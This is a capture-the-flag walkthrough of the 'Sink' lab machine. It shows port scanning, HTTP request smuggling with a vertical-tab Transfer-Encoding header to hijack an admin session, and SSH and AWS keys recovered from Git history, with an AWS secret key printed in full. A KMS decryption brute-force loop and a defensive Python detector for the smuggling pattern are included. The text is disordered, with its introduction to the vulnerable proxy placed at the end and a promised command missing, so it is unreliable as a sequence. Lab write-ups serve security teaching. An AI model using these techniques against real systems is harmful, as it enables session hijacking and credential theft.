As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of the nmap timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Tue Apr 18 07:04:49 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.225
Nmap scan report for 10.10.10.225
Host is up (0.050s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
5000/tcp open upnp
# Nmap done at Tue Apr 18 07:05:03 2023 -- 1 IP address (1 host up) scanned in 14.05 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports in more depth and save the result into a file:
Intercept the request with BurpSuite, and remove the unnecessary request headers.
The vulnerability occurs when the Transfer-Encoding header is sent together with a vertical tab. To insert the vertical tab into the BurpSuite request, echo it and base64 encode it.
echo -e '\x0b' | base64
Cwo=
Then, add the Transfer-Encoding header followed by the base64-encoded vertical tab, and base64 decode it with the Decoder tool built into BurpSuite. Enabling the display of non-printable characters makes the vertical tab easier to see. Then, copy and paste the same request again and increase the Content-Length header.
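A defender-side check for the header pattern described above, written for this post as an added example (it is not code from the original writeup): it parses the raw request without normalising it and flags the conditions a strict front-end should reject, including a control byte such as the vertical tab inside the Transfer-Encoding value while a Content-Length is also present. The placement of the vertical tab directly after the colon is an assumption, and the sample requests and host name are constructed.

```python
import re

# Any byte below 0x20 (except HTAB) or 0x7f is a control byte; RFC 9110 allows none of
# them in a field value, yet lenient parsers strip or skip them (e.g. 0x0b, vertical tab).
_CTL = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")


def parse_headers(raw: bytes):
    """Split a raw HTTP/1.1 request head into (lowercased name, raw value) pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        pairs.append((name.strip(b" \t").lower(), value))
    return pairs


def desync_findings(raw: bytes):
    """Return the reasons an edge proxy should reject this request (empty list = clean)."""
    headers = parse_headers(raw)
    te = [v for n, v in headers if n == b"transfer-encoding"]
    cl = [v for n, v in headers if n == b"content-length"]
    findings = []
    if te and cl:
        findings.append("both Content-Length and Transfer-Encoding present")
    if len(te) > 1:
        findings.append("duplicate Transfer-Encoding headers")
    for v in te:
        bad = _CTL.search(v)
        if bad:
            findings.append("control byte 0x%02x in Transfer-Encoding value" % bad.group(0)[0])
        codings = [c.strip(b" \t").lower() for c in _CTL.sub(b"", v).split(b",")]
        if codings[-1] != b"chunked":
            findings.append("chunked is not the final transfer coding")
    return findings


# Constructed sample requests: a normal comment post and one carrying the
# assumed "Transfer-Encoding:<VT>chunked" header next to a Content-Length.
CLEAN = b"POST /comment HTTP/1.1\r\nHost: sink.htb\r\nContent-Length: 5\r\n\r\nhello"
CHUNKED = b"POST /comment HTTP/1.1\r\nHost: sink.htb\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"
SMUGGLE = (b"POST /comment HTTP/1.1\r\nHost: sink.htb\r\nContent-Length: 5\r\n"
           b"Transfer-Encoding:\x0bchunked\r\n\r\n0\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("chunked", CHUNKED), ("smuggle", SMUGGLE)):
        print(label, desync_findings(req))
```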
Now, there are two new comments, and the second one has a session cookie different from ours.
Let's change it with the EditThisCookie extension.
If we reload the website, we'll see that we have become the user admin@sink.htb.
Inside the Notes section, we'll see three notes.
The three of them have credentials.
Back to the Gitea server, we'll see that it has a login page. And the credentials for the root user are the only valid ones.
There are four repositories inside.
The Key_Management repository is owned by marcus.
There are a few commits in the repository.
The Preparing for Prod commit shows an SSH private key in the hidden file .keys/dev_keys.
The .keys/dev_keys contains the private SSH key.
Let's copy it into the id_rsa file, and give it the right permissions. Then, log in as marcus, and we'll be able to grab the user flag.
nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa marcus@10.10.10.225
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 18 Apr 2023 04:03:12 PM UTC
System load: 0.19
Usage of /: 38.2% of 17.59GB
Memory usage: 57%
Swap usage: 0%
Processes: 298
Users logged in: 0
IPv4 address for br-85739d6e29c0: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.225
IPv6 address for ens160: dead:beef::250:56ff:feb9:e98a
197 updates can be installed immediately.
115 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jan 27 12:14:16 2021 from 10.10.14.4
marcus@sink:~$ whoami
marcus
marcus@sink:~$ cat user.txt
8c08168dabfa8d44d0556138ef603118
Privilege Escalation
Back to the Gitea server repositories, the Log_Management repository also has a bunch of commits.
The dev push for log group and stream creation commit contains private keys for AWS.
Using these keys, we could try to list AWS secrets. But first, we need to configure AWS with these keys.
aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: eu
Default output format [None]: json
Now, as seen below, there are secrets we can access.
The credentials for david are the only ones that work.
su david
Password:
david@sink:/home/marcus$ whoami
david
There is one directory called Projects in his home directory.
ls -l
total 4
drwxr-x--- 3 david david 4096 Dec 2 2020 Projects
This folder contains a file which is encrypted.
ls -lR
Projects/:
total 4
drwxrwx--- 2 david david 4096 Feb 1 2021 Prod_Deployment
Projects/Prod_Deployment:
total 4
-rw-r----- 1 david david 512 Feb 1 2021 servers.enc
We can try to decrypt the file with AWS. But first, we need to configure AWS again with the same keys.
aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: eu
Default output format [None]: json
The following script takes each key stored in AWS KMS (served by the local endpoint on port 4566) and tries to decrypt the servers.enc file with each of the possible encryption algorithms; only the right key and algorithm pair will succeed.
#!/bin/bash
# Try every KMS key known to the local endpoint against servers.enc with each candidate algorithm.
endpoint="http://127.0.0.1:4566"
ciphertext="fileb:///home/david/Projects/Prod_Deployment/servers.enc"
algorithms="SYMMETRIC_DEFAULT RSAES_OAEP_SHA_1 RSAES_OAEP_SHA_256"
keys=$(aws kms --endpoint-url="$endpoint" list-keys | grep KeyId | awk '{print $2}' | tr -d '",')
for algorithm in $algorithms; do
    for key in $keys; do
        echo "[*] Trying key $key with $algorithm"
        # Failed combinations only produce an error, so hide stderr and keep the one that decrypts.
        aws kms --endpoint-url="$endpoint" decrypt \
            --ciphertext-blob "$ciphertext" \
            --key-id "$key" \
            --encryption-algorithm "$algorithm" 2>/dev/null
    done
done
This is a type of proxy which is vulnerable to HTTP request smuggling (HTTP Desync) attacks, as we can see. Let's test it out. On the main page, we can leave a comment.